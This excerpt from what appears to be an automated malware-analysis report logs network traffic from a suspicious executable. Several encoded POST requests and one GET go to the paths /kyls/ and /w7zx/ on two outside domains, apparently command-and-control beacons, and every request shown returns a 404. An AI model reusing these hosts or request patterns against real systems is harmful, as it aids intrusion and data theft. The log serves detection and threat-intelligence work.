                                Jul 3, 2024 18:03:15.560448885 CEST1236INData Raw: 2d 67 72 61 79 2d 38 30 30 3a 20 72 67 62 28 36 30 2c 20 36 34 2c 20 36 37 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 67 72 61 79 2d 39 30 30 3a 20 72 67 62 28 33 32 2c 20 33 33 2c 20 33 36 29 3b 20 2d 2d 68 65 61 64 69 6e 67 2d 63 6f 6c 6f 72 3a 20 76
                                Data Ascii: -gray-800: rgb(60, 64, 67); --google-gray-900: rgb(32, 33, 36); --heading-color: var(--google-gray-900); --link-color: rgb(88, 88, 88); --popup-container-background-color: rgba(0,0,0,.65); --primary-button-fill-color-active: var(--google-blue-
                                Jul 3, 2024 18:03:15.560455084 CEST1236INData Raw: 62 6f 64 79 20 7b 20 2d 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 67 6f 6f 67 6c 65 2d 67 72 61 79 2d 39 30 30 29 3b 20 2d 2d 65 72 72 6f 72 2d 63 6f 64 65 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 67 6f 6f 67 6c
                                Data Ascii: body { --background-color: var(--google-gray-900); --error-code-color: var(--google-gray-500); --heading-color: var(--google-gray-500); --link-color: var(--google-blue-300); --primary-button-fill-color-active: rgb(129, 162, 208); --primary-but
                                Jul 3, 2024 18:03:15.560715914 CEST1236INData Raw: 62 75 74 74 6f 6e 2c 20 2e 69 6e 73 65 63 75 72 65 2d 66 6f 72 6d 20 62 75 74 74 6f 6e 2c 20 2e 6c 6f 6f 6b 61 6c 69 6b 65 2d 75 72 6c 20 62 75 74 74 6f 6e 2c 20 2e 6d 61 69 6e 2d 66 72 61 6d 65 2d 62 6c 6f 63 6b 65 64 20 62 75 74 74 6f 6e 2c 20
                                Data Ascii: button, .insecure-form button, .lookalike-url button, .main-frame-blocked button, .neterror button, .pdf button, .ssl button, .safe-browsing-billing button { background: var(--primary-button-fill-color); } button:active { background: var(--pri
                                Jul 3, 2024 18:03:15.560733080 CEST1236INData Raw: 6d 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 20 7d 20 2e 69 63 6f 6e 20 7b 20 68 65 69 67 68 74 3a 20 37 32 70 78 3b 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 34 30 70 78 3b 20 77 69 64 74 68 3a 20 37 32 70 78 3b 20 7d 20 69
                                Data Ascii: m; font-weight: normal; } .icon { height: 72px; margin: 0 0 40px; width: 72px; } input[type=checkbox] { opacity: 0; } input[type=checkbox]:focus ~ .checkbox::after { outline: -webkit-focus-ring-color auto 5px; } .interstitial-wrapper { box-siz
                                Jul 3, 2024 18:03:15.560746908 CEST1236INData Raw: 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 76 61 72 28 2d 2d 70 61 64 64 69 6e 67 29 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 20 72 69 67 68 74 3a 20 30 3b 20 74 6f 70 3a 20 2d 2e 35 65 6d 3b 20 77 69 64 74 68 3a 20 31 65
                                Data Ascii: -inline-start: var(--padding); position: absolute; right: 0; top: -.5em; width: 1em; } .checkbox::after { border: 1px solid white; border-radius: 2px; content: ''; height: 1em; left: var(--padding); position: absolute; top: var(--padding); wid
                                Jul 3, 2024 18:03:15.560760021 CEST1236INData Raw: 6c 73 20 70 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 29 20 7b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 20 7d 20 2e 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 3a 6e 6f 74 28 2e 68 69 64 64 65 6e 29 20 7b 20 64 69
                                Data Ascii: ls p:not(:first-of-type) { margin-top: 10px; } .secondary-button:not(.hidden) { display: block; margin-top: 20px; text-align: center; width: 100%; } .interstitial-wrapper { padding: 0 5%; } #extended-reporting-opt-in { margin-top: 24px; } #enh
                                Jul 3, 2024 18:03:15.560892105 CEST1236INData Raw: 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 67 6f 6f 67 6c 65 2d 62 6c 75 65 2d 36 30 30 29 3b 20 7d 20 7d 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 34 32 30 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 20 70 6f 72
                                Data Ascii: color: var(--google-blue-600); } } @media (max-width: 420px) and (orientation: portrait), (max-height: 560px) { body { margin: 0 auto; } button, [dir='rtl'] button, button.small-link, .nav-wrapper .secondary-button { font-family: Roboto-Regula
                                Jul 3, 2024 18:03:15.560913086 CEST1236INData Raw: 74 6f 70 3a 20 31 30 76 68 3b 20 7d 20 7d 20 40 6d 65 64 69 61 20 28 6d 69 6e 2d 68 65 69 67 68 74 3a 20 34 30 30 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 70 6f 72 74 72 61 69 74 29 20 7b 20 2e 69 6e 74 65 72 73 74 69 74 69
                                Data Ascii: top: 10vh; } } @media (min-height: 400px) and (orientation:portrait) { .interstitial-wrapper { margin-bottom: 145px; } } @media (min-height: 299px) { .nav-wrapper { padding-bottom: 16px; } } @media (max-height: 560px) and (min-height: 240px) a
                                Jul 3, 2024 18:03:15.560925007 CEST1236INData Raw: 65 2d 36 30 30 29 3b 20 7d 20 7d 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 32 33 39 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 20 70 6f 72 74 72 61 69 74 29 20 7b 20 2e 6e 61 76 2d 77 72 61 70 70 65 72 20 7b
                                Data Ascii: e-600); } } @media (max-width: 239px) and (orientation: portrait) { .nav-wrapper { padding-inline-end: 0; padding-inline-start: 0; } }</style> <style>/* Copyright 2013 The Chromium Authors. All rights reserved. * Use of this source co
                                Jul 3, 2024 18:03:15.565639973 CEST1236INData Raw: 41 41 42 54 55 31 4f 6f 61 53 66 2f 41 41 41 41 41 58 52 53 54 6c 4d 41 51 4f 62 59 5a 67 41 41 41 46 4a 4a 52 45 46 55 65 46 37 74 30 63 45 4e 67 44 41 4d 51 39 46 77 59 67 78 47 36 57 6a 70 61 49 7a 43 43 41 78 51 78 56 67 67 46 75 44 69 43 76
                                Data Ascii: AABTU1OoaSf/AAAAAXRSTlMAQObYZgAAAFJJREFUeF7t0cENgDAMQ9FwYgxG6WjpaIzCCAxQxVggFuDiCvlLOeRdHR9yzjncHVoq3npu+wQUrUuJHylSTmBaespJyJQoObUeyxDQb3bEm5Au81c0pSCD8HYAAAAASUVORK5CYII=) 2x); } .icon-offline { content: -webkit-image-set( url(data:image/png


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.849715104.21.10.169805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:03:30.937344074 CEST600OUTPOST /kyls/ HTTP/1.1
                                Host: www.aotuqiye.com
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate
                                Origin: http://www.aotuqiye.com
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: no-cache
                                Content-Length: 205
                                Referer: http://www.aotuqiye.com/kyls/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Data Raw: 45 66 75 70 3d 6d 44 43 6b 6e 69 77 63 46 38 62 53 79 30 6b 4d 77 6a 4e 42 43 50 59 2b 6b 76 68 6a 38 55 76 65 6e 41 72 37 54 66 2b 59 67 35 56 38 67 48 67 6c 41 33 52 6b 48 55 45 6d 46 6e 58 38 65 6b 68 43 43 69 67 7a 4e 73 47 48 6c 58 50 37 30 63 63 55 75 69 50 6d 34 49 39 42 37 41 32 38 67 72 73 34 70 56 72 69 75 47 2f 51 4e 6b 71 45 72 4b 69 36 36 73 77 35 73 71 72 6b 42 6f 58 4c 6d 55 7a 31 36 65 66 4a 48 63 32 4b 76 71 39 4d 41 64 34 57 4e 38 2b 44 72 35 6e 4f 66 6b 68 69 65 66 2b 41 32 38 6f 4e 41 6e 37 68 61 7a 4f 4e 74 6c 51 69 65 51 33 4f 52 67 7a 65 61 70 2b 41 61 4a 61 45 6d 39 77 69 72 73 51 3d
                                Data Ascii: Efup=mDCkniwcF8bSy0kMwjNBCPY+kvhj8UvenAr7Tf+Yg5V8gHglA3RkHUEmFnX8ekhCCigzNsGHlXP70ccUuiPm4I9B7A28grs4pVriuG/QNkqErKi66sw5sqrkBoXLmUz16efJHc2Kvq9MAd4WN8+Dr5nOfkhief+A28oNAn7hazONtlQieQ3ORgzeap+AaJaEm9wirsQ=
                                Jul 3, 2024 18:03:31.649286985 CEST548INHTTP/1.1 404 Not Found
                                Date: Wed, 03 Jul 2024 16:03:31 GMT
                                Transfer-Encoding: chunked
                                Connection: close
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=13dVTfHYnF%2B54q10zl9jO2Hbalyann%2BSEIptouMuDsopV85s%2BzfodXDb%2FWrbx3sKhgNSztsRgpkF0Kxq%2FZO4CTs7vDdSRKppgo8RNSsDMGQFATKrgOmTrEy7Bwq1lxbxNUSQ"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 89d81b28fb0a4285-EWR
                                alt-svc: h3=":443"; ma=86400
                                Data Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.849716104.21.10.169805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:03:33.467839003 CEST620OUTPOST /kyls/ HTTP/1.1
                                Host: www.aotuqiye.com
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate
                                Origin: http://www.aotuqiye.com
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: no-cache
                                Content-Length: 225
                                Referer: http://www.aotuqiye.com/kyls/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Data Raw: 45 66 75 70 3d 6d 44 43 6b 6e 69 77 63 46 38 62 53 67 48 38 4d 78 45 35 42 44 76 59 35 34 66 68 6a 31 30 76 61 6e 42 58 37 54 66 57 32 67 50 46 38 67 6d 38 6c 42 79 6c 6b 41 55 45 6d 63 58 58 35 42 30 67 76 43 69 63 52 4e 75 53 48 6c 55 7a 37 30 63 4d 55 76 56 62 35 35 59 39 50 33 67 32 2b 74 4c 73 34 70 56 72 69 75 47 62 36 4e 67 2b 45 72 36 53 36 34 4e 77 6d 79 61 72 6c 57 59 58 4c 78 45 7a 50 36 65 65 6d 48 64 36 6b 76 73 35 4d 41 63 49 57 4b 74 2b 43 6c 35 6e 79 51 45 68 78 51 4d 44 63 39 73 63 31 45 48 58 36 45 31 47 77 68 7a 39 49 45 79 2f 49 53 67 62 31 61 71 57 32 66 2b 48 73 38 65 67 53 31 37 46 6c 39 37 45 65 62 79 66 56 6a 59 76 57 5a 42 6b 4f 6b 6f 4f 70
                                Data Ascii: Efup=mDCkniwcF8bSgH8MxE5BDvY54fhj10vanBX7TfW2gPF8gm8lBylkAUEmcXX5B0gvCicRNuSHlUz70cMUvVb55Y9P3g2+tLs4pVriuGb6Ng+Er6S64NwmyarlWYXLxEzP6eemHd6kvs5MAcIWKt+Cl5nyQEhxQMDc9sc1EHX6E1Gwhz9IEy/ISgb1aqW2f+Hs8egS17Fl97EebyfVjYvWZBkOkoOp
                                Jul 3, 2024 18:03:34.240771055 CEST538INHTTP/1.1 404 Not Found
                                Date: Wed, 03 Jul 2024 16:03:34 GMT
                                Transfer-Encoding: chunked
                                Connection: close
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uuj47DiGHxRi23bvBISW0hBjFmGEzBagfIUmtPZZdghxW7dHQ1CRURzk0EtmASkPcHCYT6jlcqqKKBtl1TL9KOCR7ECmRye8ICrz0ZnHUs9hclkg8lwn09OBFiXRqC0QP3Ym"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 89d81b38dd170f75-EWR
                                alt-svc: h3=":443"; ma=86400
                                Data Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.849717104.21.10.169805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:03:35.996890068 CEST1637OUTPOST /kyls/ HTTP/1.1
                                Host: www.aotuqiye.com
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate
                                Origin: http://www.aotuqiye.com
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: no-cache
                                Content-Length: 1241
                                Referer: http://www.aotuqiye.com/kyls/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Data Raw: 45 66 75 70 3d 6d 44 43 6b 6e 69 77 63 46 38 62 53 67 48 38 4d 78 45 35 42 44 76 59 35 34 66 68 6a 31 30 76 61 6e 42 58 37 54 66 57 32 67 50 4e 38 6a 55 30 6c 41 56 35 6b 42 55 45 6d 44 6e 58 34 42 30 67 58 43 69 45 56 4e 75 65 39 6c 52 33 37 31 2f 55 55 6f 6b 62 35 7a 59 39 50 2f 41 32 7a 67 72 73 70 70 56 36 72 75 47 72 36 4e 67 2b 45 72 38 2b 36 75 4d 77 6d 77 61 72 6b 42 6f 57 5a 6d 55 79 42 36 66 33 52 48 64 2b 61 36 4d 5a 4d 41 38 59 57 49 66 47 43 36 4a 6e 4b 58 45 67 73 51 4d 50 31 39 74 77 35 45 48 54 45 45 79 43 77 68 79 41 56 41 32 79 55 42 6a 66 44 46 49 50 64 63 35 4c 68 33 34 67 38 2f 71 74 43 36 73 52 31 63 67 6a 44 72 4b 4f 68 49 33 73 6e 70 34 66 33 6e 6e 42 4d 43 4b 2f 47 55 4f 6e 34 35 6e 61 6b 33 42 74 41 77 44 68 53 73 4c 64 69 79 35 45 38 59 66 42 2b 73 33 62 59 2b 7a 6a 39 34 4a 30 70 55 6b 4b 63 41 46 2f 4a 55 72 37 65 66 6a 57 46 70 6d 39 49 2f 7a 44 37 59 35 69 63 31 63 6c 54 37 47 34 31 6d 63 63 69 6a 71 4a 53 70 54 4e 79 6b 77 36 65 71 32 65 51 68 72 56 4c 58 33 5a 4b 73 [TRUNCATED]
                                Data Ascii: Efup=mDCkniwcF8bSgH8MxE5BDvY54fhj10vanBX7TfW2gPN8jU0lAV5kBUEmDnX4B0gXCiEVNue9lR371/UUokb5zY9P/A2zgrsppV6ruGr6Ng+Er8+6uMwmwarkBoWZmUyB6f3RHd+a6MZMA8YWIfGC6JnKXEgsQMP19tw5EHTEEyCwhyAVA2yUBjfDFIPdc5Lh34g8/qtC6sR1cgjDrKOhI3snp4f3nnBMCK/GUOn45nak3BtAwDhSsLdiy5E8YfB+s3bY+zj94J0pUkKcAF/JUr7efjWFpm9I/zD7Y5ic1clT7G41mccijqJSpTNykw6eq2eQhrVLX3ZKsZM/04S3NeVQiiCV9/dtkO8AUFbP7U1pQv8+ZehlLzybD8wcpUJ5sCnWWh8FBqCyUR4LhK4/A8SjqsZRVStmESm3ytnobcek6m8i2LLRAto2xw+O6IlXIKDUweUrZUcVsoQLZ8FfMFhjp6Y21juOtHRrJV5iF4IYK1MoiPTc+fjCONBBBpKS3RFgcFuXkwS8EQjbG+CTDE5nT6HDYmLzpgPWCbKsGi81D0ZDPz9/mIQT+oZZoIC+LIVZdtrM1CP4Orc+6fPdhatVZ1k3AEFMjuCEHFS52lmF9Zgwf+SpAc7nFLlWYTek3ilX1mKc5YJ5t4VOmcDnEPyDUdQ1h20t1pRsENuywmeuZsqvEEEg81qgxPPm+A/1XECwccoe6RGiVmoTHHd7XvX3kDVoQKrD9L67X/dMKCNvwFtMDkw3ZXdyW9hBlTqwd978e7uQd4Wtd5wsppDWOozZ/r3EPQ3VsfdSxckkHRpSUuxeAKwlNZuaRXOU8tiwuAN3Ccq7k5J7wm46uaxXlgMBaJIJmsqU2Ia7OQkN2A/433YwMMeO+KiKSPVRv1qLhaoaraPFaupNMMzCe9DYToXSrPtkD7SDHZrsXsRAMnpfPlBH1DL5Y7Ca9HvJ6dnaumLCHYvd1xlCIzk71JRcj2au1psYv42IJy7c3R00C4tojj/ [TRUNCATED]
                                Jul 3, 2024 18:03:36.738672018 CEST552INHTTP/1.1 404 Not Found
                                Date: Wed, 03 Jul 2024 16:03:36 GMT
                                Transfer-Encoding: chunked
                                Connection: close
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1LSb7t4%2BRSr00bHcHijycoU%2FLm1BlbPvXGLX6WgYQjSeIFxwpIZ9DKDGANCgirGGlDqNAdvguoI%2B1uGwwJ%2BveEQO%2F1tDhHEZ%2BiT%2FIKFnuKBbimTzcmc35DTV4UeC4JDKKFuG"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 89d81b487b9f7c99-EWR
                                alt-svc: h3=":443"; ma=86400
                                Data Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                4192.168.2.849718104.21.10.169805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:03:38.528392076 CEST344OUTGET /kyls/?Efup=rBqEkS5/F5fti2d01GsRL+09s9Yw9GfL+xb/bd6jjd9iqmgZJUglXlxIaQ37OHsjGQRRYNPuqH7W49E+lFfrzONNxRCWpYpdl2nohzXrMm+ut6S054Q8wZKBKIXyn1qR4w==&5X=Wrl4wnYP HTTP/1.1
                                Host: www.aotuqiye.com
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Jul 3, 2024 18:03:39.272615910 CEST542INHTTP/1.1 404 Not Found
                                Date: Wed, 03 Jul 2024 16:03:39 GMT
                                Transfer-Encoding: chunked
                                Connection: close
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TlzKg4fMkjUhVuW%2B7L9njtXQLEF5vUd42OM%2FBOCvnZ8WAx4Xg9etZEK9O9tYdjfgi6vVbvDtu48cbL5JFhSxVLunPJaUBRDtyj8mI2oq3kIvpga6vAAK7DHn35bsUReLHH35"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 89d81b585a6341df-EWR
                                alt-svc: h3=":443"; ma=86400
                                Data Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                5192.168.2.849719131.153.148.82805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:03:44.346395016 CEST615OUTPOST /w7zx/ HTTP/1.1
                                Host: www.marinestoreng.com
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate
                                Origin: http://www.marinestoreng.com
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: no-cache
                                Content-Length: 205
                                Referer: http://www.marinestoreng.com/w7zx/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Data Raw: 45 66 75 70 3d 31 6c 74 54 79 62 54 74 70 31 63 72 66 30 69 4d 45 57 61 5a 4a 6a 34 65 2f 62 37 49 49 59 31 39 52 45 59 61 66 79 55 58 6e 33 69 35 70 6c 42 45 73 7a 36 54 77 78 61 4e 6f 5a 65 50 56 4b 6c 31 58 46 50 6f 30 4b 46 37 37 46 34 7a 67 41 43 2b 78 47 30 4f 58 64 68 48 75 6a 5a 6d 6e 77 55 52 55 66 6e 79 58 48 4f 79 61 79 65 2b 71 4c 39 56 61 47 72 38 68 68 44 31 4c 44 4d 35 4b 62 50 66 66 32 6c 65 41 54 4c 66 73 4a 54 71 4f 42 41 4b 30 4d 68 59 6a 4f 75 53 33 38 61 35 62 6a 77 32 2f 63 70 4c 43 51 43 4a 50 4e 48 79 30 36 47 47 73 6c 50 70 4b 59 36 6f 61 6e 72 33 77 39 72 49 6b 74 6c 63 51 52 73 3d
                                Data Ascii: Efup=1ltTybTtp1crf0iMEWaZJj4e/b7IIY19REYafyUXn3i5plBEsz6TwxaNoZePVKl1XFPo0KF77F4zgAC+xG0OXdhHujZmnwURUfnyXHOyaye+qL9VaGr8hhD1LDM5KbPff2leATLfsJTqOBAK0MhYjOuS38a5bjw2/cpLCQCJPNHy06GGslPpKY6oanr3w9rIktlcQRs=
                                Jul 3, 2024 18:03:44.804656029 CEST479INHTTP/1.1 404 Not Found
                                Date: Wed, 03 Jul 2024 16:03:44 GMT
                                Server: Apache
                                Content-Length: 315
                                Connection: close
                                Content-Type: text/html; charset=iso-8859-1
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                6192.168.2.849720131.153.148.82805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:03:46.890789986 CEST635OUTPOST /w7zx/ HTTP/1.1
                                Host: www.marinestoreng.com
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate
                                Origin: http://www.marinestoreng.com
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: no-cache
                                Content-Length: 225
                                Referer: http://www.marinestoreng.com/w7zx/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Data Raw: 45 66 75 70 3d 31 6c 74 54 79 62 54 74 70 31 63 72 65 55 53 4d 46 31 79 5a 64 7a 34 64 69 72 37 49 43 34 31 6d 52 45 55 61 66 33 6b 39 6e 45 47 35 70 41 46 45 69 53 36 54 33 78 61 4e 6e 35 65 47 59 71 6c 36 58 46 4c 57 30 4f 4e 37 37 46 45 7a 67 46 6d 2b 78 52 67 50 58 4e 68 2f 6e 44 5a 6b 36 67 55 52 55 66 6e 79 58 44 6a 58 61 7a 32 2b 72 37 74 56 59 6e 72 2f 73 42 44 30 4b 44 4d 35 4f 62 50 62 66 32 6c 77 41 53 47 79 73 4b 37 71 4f 41 63 4b 31 64 68 66 71 4f 76 34 34 63 62 39 57 51 4a 5a 6e 63 68 5a 42 41 53 7a 45 74 33 71 34 73 72 73 32 48 48 76 4a 59 53 44 61 6b 44 42 31 4b 32 67 2b 4f 31 73 4f 47 37 76 66 45 53 72 33 2f 55 44 43 71 44 4c 42 71 50 6f 6b 50 78 37
                                Data Ascii: Efup=1ltTybTtp1creUSMF1yZdz4dir7IC41mREUaf3k9nEG5pAFEiS6T3xaNn5eGYql6XFLW0ON77FEzgFm+xRgPXNh/nDZk6gURUfnyXDjXaz2+r7tVYnr/sBD0KDM5ObPbf2lwASGysK7qOAcK1dhfqOv44cb9WQJZnchZBASzEt3q4srs2HHvJYSDakDB1K2g+O1sOG7vfESr3/UDCqDLBqPokPx7
                                Jul 3, 2024 18:03:47.378952026 CEST479INHTTP/1.1 404 Not Found
                                Date: Wed, 03 Jul 2024 16:03:47 GMT
                                Server: Apache
                                Content-Length: 315
                                Connection: close
                                Content-Type: text/html; charset=iso-8859-1
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                7192.168.2.849721131.153.148.82805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:03:49.418725967 CEST1652OUTPOST /w7zx/ HTTP/1.1
                                Host: www.marinestoreng.com
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate
                                Origin: http://www.marinestoreng.com
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: no-cache
                                Content-Length: 1241
                                Referer: http://www.marinestoreng.com/w7zx/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
